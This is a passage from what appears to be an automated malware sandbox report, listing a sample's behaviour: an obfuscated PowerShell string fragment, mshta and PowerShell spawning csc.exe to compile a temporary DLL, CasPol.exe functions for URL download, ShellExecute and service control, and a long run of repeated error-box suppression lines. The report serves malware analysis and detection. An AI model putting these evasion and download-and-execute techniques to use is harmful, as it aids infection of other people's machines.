ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,18_2_0041BCE3
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_052C55EF pushfd ; retf 3_2_052C5619
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_052C5641 pushfd ; retf 3_2_052C5619
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07DF2C6C push eax; ret 3_2_07DF2C81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004567E0 push eax; ret 18_2_004567FE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0045B9DD push esi; ret 18_2_0045B9E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00455EAF push ecx; ret 18_2_00455EC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00433FF6 push ecx; ret 18_2_00434009
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00406128 ShellExecuteW,URLDownloadToFileW,18_2_00406128
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,18_2_00419BC4

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,18_2_0041BCE3
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
